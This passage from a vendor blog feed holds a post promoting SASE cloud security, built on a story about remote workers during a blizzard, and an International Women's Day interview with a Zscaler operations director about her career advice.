to indirect security routing. Locked in at home, locked out of the network That point got hammered home a few winters ago. During and after the blizzard, no employees could come into the office. 
Everybody was out of the “castle” and outside the perimeter protection of the company’s security “moat.” They had VPN access available, but as people jumped on VPNs and their traffic competed for limited bandwidth, app performance slowed to a crawl. Everybody stuck working from home defaulted to the path of least resistance to get things done: Home broadband, Wi-Fi, and mobile connections. His security teams lost all control of any corporate devices not using their network. They couldn’t see anything employees were doing, or the status of device health, until users reconnected to the corporate network. Once those devices rejoined the network, the security teams could see and stop malicious traffic. But the damage was already done: There was a huge increase in malicious traffic once devices reconnected. The blizzard buried my friend’s security teams in threats. Through this experience, the team realized important truths about the changing workforce and began to realign their security strategy to be more flexible and resilient and to focus on user experience as a key component of security and access control. Here’s why: Users have a low tolerance for delay. Any security that is difficult, inconvenient, or prevents access WILL be ignored or bypassed. Centralized security is difficult (and expensive) to scale and can be inflexible to accommodate new circumstances. This is especially true now that enterprises are consuming more and more space in clouds and using “X”-as-a-Service (XaaS) to bolster infrastructure and increase productivity. Security must be inline between the user and the application. Users default to whatever gets them access to what they need, immediately. Enterprise security must support this behavior. The team turned to SASE, which prepared them for 2020 My friend’s team realized that even though blizzards don’t occur every day, the workforce was changing, with more and more people working remotely. 
At the same time, the company was using as many cloud-delivered applications and services as it had in the data center. The castle-and-moat security model would not effectively secure employees connecting from home and on the road, and would create a poor experience for those connecting to cloud apps. They turned to SASE. The secure access service edge (SASE) solution is a better alternative to a centralized security model. Cloud-based SASE positions security inline, securing every connection between users and applications, no matter where they (the users or the applications) sit. SASE security services are distributed across the cloud, near each user: Users can go directly to the internet to access applications, infrastructure, or data. This negates the need for backhauling all traffic through a central security stack and removes bottlenecks to SaaS applications like Microsoft 365. Because the team learned from its experiences during and after the blizzard and adopted a SASE model, it was able to pivot quickly to a fully at-home workforce in the wake of the COVID crisis. While many organizations had to make do in the early days with overloaded VPN infrastructures and inadequate security, my friend's organization was ready, thanks to SASE, and able to keep employees safe and productive while maintaining security. SASE is the future of security A SASE cloud security platform is built to accommodate digital transformation and the modern enterprise, and is an excellent way to ensure application and network performance and scalability. It allows users to directly access applications and services in the cloud without routing traffic through centralized security stacks that become bottlenecks for user experience. With a globally distributed platform, users are always only a short hop from their applications. During unexpected crises of any size or duration, businesses need to be able to continue operations with minimal disruption. 
In this hyper-connected world in which the majority of business communications and activity is conducted over the internet, the answer is SASE. Tue, 09 Mar 2021 12:20:43 -0800 Nathan Howe Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential and powerful women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Jey Govindan, Director of Service Operations and Enablement, joined Zscaler in July 2020. Her role is focused on enablement, onboarding, and implementing tools and processes to help her team succeed. We spoke with Jey to get some insight into her career, what gives her fulfillment, and how she plans to inspire future generations of women in tech. “I’m really proud of my career,” she said. “First of all, I want to thank the great leadership that we have here at Zscaler and also the leadership that I’ve worked with in my previous companies. That trust and confidence that they had in me gave me an opportunity to think out of the box and come up with innovative solutions—whether it is setting up teams, creating hiring strategies, or implementing tools and automation—that really helped me deliver results that made our customers happy.” Q: What advice do you have for women wanting to get into tech? A: Don't fear technology. Getting into tech is the same as getting into any space. We all have to develop our skills to be the best, regardless of the field. As long as we commit to working hard and giving it our best, there is nothing to fear—go for it! My advice to women is to not succumb to labeling and stereotyping—all that we need to do is self-analyze and understand from our deep, calm, inner self what we want to do, and stick to it. Q: What professional advice would you give your younger self? A: Have long-term goals. 
I planned my career, for the most part, around the technology industry and how I wanted to work within it, with goals of contributing to the leaders in that space. These were three- to five-year plans. If I were to advise my younger self, I would say to plan your career ten, or even 15, years into the future and dream the full journey a bit more. Q: Who was your greatest inspiration when you were growing up and why? A: My dad has been my inspiration from day one, and he still is. He was a true multi-talented gentleman and we were very close. He was an elite sportsman, engineer, and math wizard. He worked hard and was always very kind and humble. For me, there is so much that I continue to learn from him. Q: Based on this year's IWD theme, "Choose to Challenge," how do you plan to celebrate women's achievements and forge a path for future rockstar women in tech? A: I love this year's International Women's Day theme! We all need to commit ourselves to "Choose to Challenge." I am who I am because I chose to challenge in the past. With growing awareness, I am 100 percent sure that in a matter of years we won't have to fight so much! Q: Is there anything you'd like to add about your career journey or women in tech? A: I am here as a sounding board, a mentor, or simply to share my experience with young women. For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women's Day. Further reading: Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik Tue, 09 Mar 2021 08:00:01 -0800 Kristi Myllenbeck